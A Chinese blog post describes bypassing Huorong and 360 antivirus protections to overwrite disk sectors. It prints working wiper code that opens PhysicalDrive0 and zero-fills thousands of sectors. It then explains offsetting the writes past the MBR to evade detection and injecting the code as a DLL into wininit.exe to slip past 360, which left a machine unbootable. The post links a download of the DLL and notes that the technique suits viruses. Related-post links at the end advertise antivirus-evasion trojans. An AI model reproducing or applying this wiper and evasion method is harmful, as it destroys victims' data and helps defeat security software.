如何利用DLL注入绕过火绒和360主动防御写入扇区?
前言
由于我自己是一个系统安全爱好者,之前下载了一个能覆写所有扇区的病毒源码,我以为火绒可以保护我的扇区,我就傻乎乎的调试运行了,然后火绒把mbr写入拦截了,我以为没有任何问题了,已重启,哦,Missing Operating System。
在痛失电脑之后,我一直在想病毒是如何做到火绒报警了但是还是写入了扇区?后来我简单分析了源码之后,我看到了这样的一段代码
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpszArgument,int nCmdShow) {HANDLE drive = CreateFileA("\\\\.\\PhysicalDrive0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);DWORD wb;unsigned char *bootcode = (unsigned char *)LocalAlloc(LMEM_ZEROINIT, 512);SetFilePointer(drive, 0, NULL, FILE_BEGIN);for(int i = 0;i < 50000;i++){WriteFile(drive, bootcode, 512, &wb, NULL);SetFilePointer(drive, 512, NULL, FILE_CURRENT);}CloseHandle(drive);这个病毒从0扇区开始写,写入了前5000扇区,而火绒只会拦截0扇区(也就是MBR)的写入!所以病毒运行之后火绒虽然拦截了MBR写入,但是1-5000扇区还是被写入了,所以会Missing Operating System. 我也开始了尝试,首先是这个病毒能不能绕过360?答案是不能,360会对所有写入磁盘的行为进行拦截,就算是cmd都不行
但是我认为360也是有疏忽的时候,我打算尝试通过DLL注入来实现绕过360写入扇区
DLL注入
要写一个写入扇区的DLL也不是很难,只要基于上方代码修改即可,为了绕过360和火绒对mbr的检测,我把上方代码修改为从2000扇区开始写。然后编译成DLL
我第一个想到的思路是注入可信任进程,但是经过一番尝试,无论是cmd、explorer还是svchost,都不能绕过360的监测
于是我有了一个大胆的想法,既然cmd、svchost、explorer都在360的“监测”范围内,我就注入wininit,wininit是系统进程,干啥360也管不到把?
现在找到wininit的进程,然后注入我编写的DLL,360没有反应,但是几秒之后,喜闻乐见的蓝屏出现了
根据蓝屏代码0x000000F4,大概可以知道是wininit因为DLL注入崩溃了,所以引发了蓝屏 ,然后重启虚拟机,可以看到已经不能开机了,而因为一部分扇区已经被填充,就算Disk Genius来了应该都救不回来
Missing Operating System
这个思路应该很容易应用在病毒里
也希望大家谨防自己的wininit被注入dll吧2333333
我写的DLL下载,欢迎大家研究:【动态链接库】自己编写的AttachKiller.dll,注入wininit.exe可以绕过360写扇区-系统安全文档类资源-CSDN下载
如何利用DLL注入绕过火绒和360主动防御写入扇区?相关推荐
- 【记录】kali制作绕过火绒检测的木马(仅通过MSF的方式)
目的:制作一个能够绕过火绒检测的简单木马,熟悉一下怎么使用msfvenom制作木马,因此此处使用的火绒版本较低. 工具准备:火绒安全-3.0.42.0 下载文章:火绒历史全版本 百度网盘链接:http ...
- 记一次绕过火绒安全提权实战案例
0x01 前言 朋友发来一个站让帮看下提权,服务器上安装的有护卫神+火绒+安全狗等安全防护软件,看着确实挺唬人,他也试了不少常用提权EXP,结果都失败了,可能是欠缺免杀EXP能力吧,当然也有可能是修复 ...
- 利用JS代码判断火绒安全是否在用户本地运行
有言在先 请勿利用此功能用于任何非法用途,本功能非火绒安全漏洞 此功能主要的应用场景是捆绑下崽软件,如果是火绒用户就给下载纯净版或者无法被探测到的捆绑软件,避免软件阻断影响推广效果.软件安装需要征得用 ...
- Python免杀火绒、360和Defender
目录 简介 环境 原理 加载ShellCode 定位特征码 Base64编码绕过 简介 之前学习免杀都是使用Metasploit自带的编码进行,从未成功过.也使用过GitHub上别人提供的免杀方法,最 ...
- CobaltStrike木马artifact.exe规避火绒,360,node32沙盒的方法分析
最近发现一个奇怪的现象,我用CobaltStrike直接生成一个裸奔测试后门artifact.exe 然后使用火绒扫描,火绒居然没有直接查杀 自己上线自己 按理说这种被渗透人员大量使用的后门,不管它原 ...
- 红队培训班作业 | 五种免杀bypass火绒360姿势横向测评:哪款更适合你?
文章来源|MS08067 红队培训班第12节课作业 本文作者:某学员A(红队培训班1期学员) 按老师要求尝试完成布置的作业如下: 一.远程线程注入 (一)通过MSF生成payload 通过msfven ...
- MSF(3)——apk和exe的加马(过360、火绒)
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 文章目录 前文链接 工具地址 shielden 520apkhook exe 加马 shellter附加 安装 软件准备 添加后门 杀软测试 加 ...
- x64dbg 修改为dll_c++笔记(dll 注入的实现)
//新建项目a //新建源文件a.c 代码如下 //生成a.exe#include<stdio.h> #include<stdlib.h> #include <windo ...
- Invoke-Obfuscation混淆免杀过360和火绒
微信公众号:乌鸦安全 扫取二维码获取更多信息! 更新时间:2021-05-31 Invoke-Obfuscation下载地址:https://github.com/danielbohannon/Inv ...
最新文章
- LaZagne检测windows本地存储的密码
- 华人计算机视觉鼻祖、双院外籍院士黄煦涛逝世,昔日名师门徒遍天下
- Perl IO:文件锁
- c语言3级菜单_大一新生作品:利用 C 语言实现quot;通讯录管理系统quot;,直言太简单...
- 八、马科维茨投资组合
- java调用keras theano模型_使用Keras获得模型输出的梯度w.r.t权重
- 一、操作系统——处理机(作业)调度算法:先来先服务算法FCFS、最短作业优先算法SJF(非抢占式)、 最短剩余时间优先算法SRTN(抢占式)、最高响应比优先算法HRRN
- 如何优雅的使用iBatis
- 201671010103 2016-2017-2 《Java程序设计》第二周学习心得
- sun认证 java怎么考_Sun认证Java程序员考试技巧分享
- 计算机管理调整磁盘分区,win7系统硬盘分区调整方法图解
- python实现单机斗地主_用Python破解斗地主残局
- java swing GUI窗口美化
- Hive中自定义函数详解
- 「hdu6638」Snowy Smile【稀疏矩阵最大子矩阵和】
- jdk安装包解压后如何安装(jdk下载安装)
- C语言进阶第23式:#error和#line的使用分析
- 用伪造的TCP协议头花式欺骗核心转发设备?
- 给你一个团队,你应该怎么管?制度是绝情的,管理是无情的,执行是合情的
- 程序员该造轮子吗,造轮子能升职加薪吗?